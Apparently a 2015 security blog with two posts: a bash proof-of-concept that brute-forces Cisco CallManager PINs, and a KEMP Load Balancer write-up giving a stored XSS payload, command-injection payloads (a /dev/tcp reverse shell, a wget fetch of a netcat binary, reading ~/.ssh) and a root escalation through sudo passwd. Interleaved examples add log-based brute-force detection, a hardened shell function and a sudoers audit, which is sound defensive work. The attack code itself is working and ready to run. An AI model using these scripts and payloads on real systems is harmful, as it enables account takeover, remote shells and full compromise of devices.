Thursday 2 April 2015

PoC for Cracking Cisco PINs

As a follow-up to the work done by Roberto SL here:

http://blog.malerisch.net/2012/10/callmanager-pin-bruteforce.html


I've gone ahead and written some quick-and-dirty PoC code for this.  Might be useful as a tool to remind people to use account lockout thresholds...

#!/bin/bash
echo "Cisco VoIP Phone Pin Cracker, 2015 PWH"

if [ "$#" -eq 0 ]; then
    echo "Usage: $0 <ip> <user-id>"
    exit
fi

userid=$2
ccmip=$1

echo -e "Targeting user id $userid on $ccmip\n"
echo "Checking if already logged in... "
curl "https://$ccmip/ccmpd/pdCheckLogin.do?name=undefined" -ks | grep -q 'Personal Address Book'

if [ `echo $?` -eq 0 ]; then
    echo -n "+ IP already logged in, logging out... "
    curl -ks `curl -ks "\`curl "https://$ccmip/ccmpd/pdCheckLogin.do?name=undefined" -ks | grep LogoutPage | cut -d\> -f2 | cut -d\< -f1\`" | grep logout | cut -d\> -f2 | cut -d\< -f1` > /dev/null
    echo "Done"
else
    echo "+ IP not logged in, proceeding to crack $userid..."
fi

echo -ne "Grabbing a SID... "
SID=`curl "https://$ccmip/ccmpd/pdCheckLogin.do?name=undefined" -ks | grep sid | cut -d\= -f2 | cut -d\< -f1`
echo $SID

function authattempt {
    curl -ks "https://$ccmip/ccmpd/login.do?sid=$SID&userid=$userid&pin=$1" | grep -q 'Login Unsuccessful'
    if [ `echo $?` -eq 0 ]; then
        echo -ne "$1 didn't work\\r"
    else
        echo "$1 worked         "
        exit
    fi
}

echo "Testing user-id as PIN... "
authattempt $userid
echo "Testing common PINs... "
authattempt 1234
authattempt 4321
authattempt 0000
authattempt 1111
authattempt 2222
authattempt 3333
authattempt 4444
authattempt 5555
authattempt 6666
authattempt 7777
authattempt 8888
authattempt 9999
authattempt 0123
echo "Bruteforcing range... "
# rangeBegin and rangeEnd are not set anywhere in the script as posted
seq -f "%04.f" $rangeBegin $rangeEnd | while read line; do authattempt $line; done
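On the detection side, the guessing above is easy to spot because every attempt is a GET to /ccmpd/login.do with the userid and pin in the query string. The following is an added example, not part of the original post: it assumes the requests are visible in a common-log-format access log (for instance on a reverse proxy in front of the server), and the sample lines and function names are constructed.

```shell
#!/bin/sh
# Added example: flag PIN guessing against /ccmpd/login.do in an access log.
# Assumption: common log format (client IP in field 1, request path in field 7).
# Because the PIN travels in the URL, such logs also contain every guessed
# PIN, including any correct one, and should be handled as sensitive.

sample_log() {  # constructed sample lines, not captured traffic
    cat <<'EOF'
10.0.0.5 - - [02/Apr/2015:10:00:01 +0000] "GET /ccmpd/login.do?sid=AAA&userid=1001&pin=1001 HTTP/1.1" 200 512
10.0.0.5 - - [02/Apr/2015:10:00:01 +0000] "GET /ccmpd/login.do?sid=AAA&userid=1001&pin=1234 HTTP/1.1" 200 512
10.0.0.5 - - [02/Apr/2015:10:00:02 +0000] "GET /ccmpd/login.do?sid=AAA&userid=1001&pin=1234 HTTP/1.1" 200 512
10.0.0.5 - - [02/Apr/2015:10:00:02 +0000] "GET /ccmpd/login.do?sid=AAA&userid=1001&pin=4321 HTTP/1.1" 200 512
10.0.0.5 - - [02/Apr/2015:10:00:03 +0000] "GET /ccmpd/login.do?sid=AAA&userid=1001&pin=0000 HTTP/1.1" 200 512
10.0.0.5 - - [02/Apr/2015:10:00:03 +0000] "GET /ccmpd/login.do?sid=AAA&userid=1001&pin=1111 HTTP/1.1" 200 512
10.0.0.9 - - [02/Apr/2015:10:05:10 +0000] "GET /ccmpd/pdCheckLogin.do?name=undefined HTTP/1.1" 200 730
10.0.0.9 - - [02/Apr/2015:10:05:20 +0000] "GET /ccmpd/login.do?sid=BBB&userid=2002&pin=8462 HTTP/1.1" 200 512
10.0.0.9 - - [02/Apr/2015:10:05:31 +0000] "GET /ccmpd/login.do?sid=BBB&userid=2002&pin=8642 HTTP/1.1" 200 498
EOF
}

# Prints "client userid attempts distinct_pins" for every client/userid pair
# that tried at least $1 different PINs. Reads the log on stdin.
detect_pin_bruteforce() {
    awk -v max="$1" '
    function param(q, name,    re, s) {      # value of one query parameter
        re = "[?&]" name "=[^& ]*"
        if (!match(q, re)) return ""
        s = substr(q, RSTART, RLENGTH)
        return substr(s, index(s, "=") + 1)
    }
    index($7, "/ccmpd/login.do?") == 1 {
        key = $1 " " param($7, "userid")
        tries[key]++
        pin = param($7, "pin")
        if (!((key, pin) in seen)) { seen[key, pin] = 1; pins[key]++ }
    }
    END {
        for (k in tries) if (pins[k] >= max) print k, tries[k], pins[k]
    }' | sort
}

sample_log | detect_pin_bruteforce 5
```

Counting distinct PINs rather than raw requests keeps a user who retypes the same wrong PIN from being flagged, and the threshold should sit at or below the account lockout threshold configured on the server.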

Breaking KEMP Load Balancer with Roberto...!

So back in October, Roberto SL and I had a play with the KEMP Load Balancer and found a whole load of issues with it :-)   On this version I had a first pass at it and found XSS (stored), Command Injection (with a lovely easy privesc up to root...) and that it was vulnerable to Shellshock!  Happy days...

After this, Roberto really went to town on it and smashed it!  His main post is here:  http://blog.malerisch.net/2015/04/playing-with-kemp-load-master.html

Stored XSS in the MoTD


POST'ing to /progs/doconfig/setmotd with something like "testing</textarea><script>alert(1)</script>" works well, and the result is handily presented to *every* user as soon as they log in.

Command Injection


POST /progs/doconfig/setmotd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://x.x.x.x/progs/doconfig/setmotd
Cookie: JSESSIONID=XXXX
Authorization: Basic XXXX==
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

motd='&motdsub=Set+MotD

The response to this contains the following string:
/usr/wui/progs/util.sh: eval: line 385: unexpected EOF while looking for matching `''
/usr/wui/progs/util.sh: eval: line 386: syntax error: unexpected end of file

This refers to the following function in the bash script:
read_post()
{
        set -f
        eval ${1}=\'`post_read "$1" "$post"`\'
        set +f
}


Some working examples:
  • motd='\`a ls\`'&motdsub=Set+MotD    (meh)
  • motd='\`a bash --help\`'&motdsub=Set+MotD   (okay...)
  • motd='\`a ls -la ~/.ssh \`'&motdsub=Set+MotD    (heh) 
  • motd='\`a echo -e \'bash -i > /dev/tcp/x.x.x.x/4444 0<\\x261 2>\\x261\'\`'&motdsub=Set+MotD  (w00h00)
  • motd='\` cd /tmp; wget http://x.x.x.x/nc-static-exec \`'&motdsub=Set+MotD  (seriously...  this thing has wget installed...)
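Why read_post is injectable, and one way to harden it, shown side by side. This is an added example and not KEMP's code: post_read here is a hypothetical stand-in for the appliance's helper, the POST body is constructed, and a harmless marker variable takes the place of a command.

```shell
#!/bin/sh
# Added example, not KEMP's code. post_read is a hypothetical stand-in for the
# appliance helper: it returns one field's raw value from a form body.
post_read() {  # $1 = field name, $2 = body
    printf '%s\n' "$2" | tr '&' '\n' | sed -n "s/^$1=//p" | head -n 1
}

# The pattern quoted in the post: the value is pasted between single quotes
# and the result is re-parsed as shell source, so a quote inside the value
# ends the string and whatever follows is run as shell code.
read_post_vulnerable() {
    set -f
    eval ${1}=\'`post_read "$1" "$post"`\'
    set +f
}

# Hardened form: accept only a valid variable name, then let eval see a
# reference to the value, never the value text itself.
read_post_safe() {
    case $1 in
        ''|[!A-Za-z_]*|*[!A-Za-z0-9_]*) return 1 ;;
    esac
    _rp_val=$(post_read "$1" "$post")
    eval "$1=\$_rp_val"
}

# Constructed body: the marker assignment stands in for an injected command.
post="motd=x'; INJECTED=yes; y='&motdsub=Set+MotD"

# Each runner works in a subshell and reports whether the marker got set.
run_vulnerable() {
    ( unset INJECTED; read_post_vulnerable motd; printf '%s' "${INJECTED:-no}" )
}
run_safe() {
    ( unset INJECTED; read_post_safe motd; printf '%s|%s' "${INJECTED:-no}" "$motd" )
}

echo "vulnerable: INJECTED=$(run_vulnerable)"
echo "hardened:   $(run_safe)"
```

With the hardened form the quote characters arrive in motd as data, so the stored XSS described earlier still needs output encoding where the MoTD is rendered.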

Privesc up on the box using poorly configured sudoers:

bash-3.00$ cat /etc/sudoers
# sudoers file.
#
# User privilege specification
Defaults        logfile=/dev/null,!syslog
root    ALL=(ALL) ALL
bal     ALL = NOPASSWD: /bin/mount, /bin/umount, /sbin/reboot, /sbin/killproc, /bin/date, /bin/cp, /bin/rm, /bin/chmod, /etc/rc.d/config, /etc/rc.d/rsync, /sbin/startproc, /sbin/hwclock, /bin/loadkeys, /sbin/ifconfig, /etc/rc.d/pull_config, /etc/rc.d/sslproxy, /etc/rc.d/iptables, /usr/bin/passwd, /bin/mv, /sbin/ntpdate
hsync   ALL = NOPASSWD: /etc/rc.d/config,/etc/rc.d/rsync,/sbin/hwclock,/usr/sbin/tsync,/bin/date
bash-3.00$ sudo /usr/bin/passwd root
New Password:XXXX
Reenter New Password: XXXX
Changing password for root.
bash-3.00$ su root -
Password: XXXX
pwd
/
touch testing
ls -la testing
-rw-r--r--  1 root root 0 Nov  4 10:50 testing
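A quick audit for the two problems visible in that sudoers file: sudo logging switched off, and NOPASSWD entries for binaries that change credentials or arbitrary files with no arguments pinned. This is an added example, not from the original post; the risk list is an assumption to be tuned per site, and the input is the sudoers text quoted above.

```shell
#!/bin/sh
# Added example: audit a sudoers file for disabled logging and for
# unrestricted NOPASSWD access to sensitive binaries.

sample_sudoers() {  # the sudoers lines quoted in the post
    cat <<'EOF'
# sudoers file.
#
# User privilege specification
Defaults        logfile=/dev/null,!syslog
root    ALL=(ALL) ALL
bal     ALL = NOPASSWD: /bin/mount, /bin/umount, /sbin/reboot, /sbin/killproc, /bin/date, /bin/cp, /bin/rm, /bin/chmod, /etc/rc.d/config, /etc/rc.d/rsync, /sbin/startproc, /sbin/hwclock, /bin/loadkeys, /sbin/ifconfig, /etc/rc.d/pull_config, /etc/rc.d/sslproxy, /etc/rc.d/iptables, /usr/bin/passwd, /bin/mv, /sbin/ntpdate
hsync   ALL = NOPASSWD: /etc/rc.d/config,/etc/rc.d/rsync,/sbin/hwclock,/usr/sbin/tsync,/bin/date
EOF
}

# Reads sudoers text on stdin. Prints "LOGGING-DISABLED" and/or one
# "RISKY <user> <binary>" line per finding.
audit_sudoers() {
    awk '
    BEGIN {
        # Assumed risk list: binaries that change credentials or arbitrary
        # files when run as root. Extend it to match local policy.
        n = split("/usr/bin/passwd /bin/cp /bin/mv /bin/chmod /bin/mount /bin/rm", r, " ")
        for (i = 1; i <= n; i++) risky[r[i]] = 1
    }
    /^[ \t]*#/ || NF == 0 { next }
    $1 == "Defaults" {
        if ($0 ~ /!syslog/ || $0 ~ /logfile=\/dev\/null/) print "LOGGING-DISABLED"
        next
    }
    /NOPASSWD:/ {
        user = $1
        list = $0
        sub(/^.*NOPASSWD:[ \t]*/, "", list)
        m = split(list, cmd, /[ \t]*,[ \t]*/)
        for (i = 1; i <= m; i++) {
            split(cmd[i], w, " ")          # w[1] = binary, w[2..] = pinned arguments
            if ((w[1] in risky) && !(2 in w)) print "RISKY " user " " w[1]
        }
    }'
}

sample_sudoers | audit_sudoers
```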

For anybody else wanting to check out the latest version of KEMP: the KEMP VMware image can be freely downloaded from their website. Alter the vmx file to include the line:

bios.bootOrder = "ethernet5,ethernet2,cdrom,hdd,floppy"

...and boot off the Kali live CD (the 64-bit version is more useful, as a lot of the custom binaries on the KEMP build are 64-bit), then do the following to get the image open:
  1. mount the first sda partition in kali
  2. gunzip the initrd.gz
  3. mkdir initrdmount
  4. mount -o loop initrd initrdmount
  5. KEMP filesystem now free to explore…  :-)
 


Wednesday 1 April 2015

At last...!

This has been a long time coming but finally here's my blog.  First pointless point.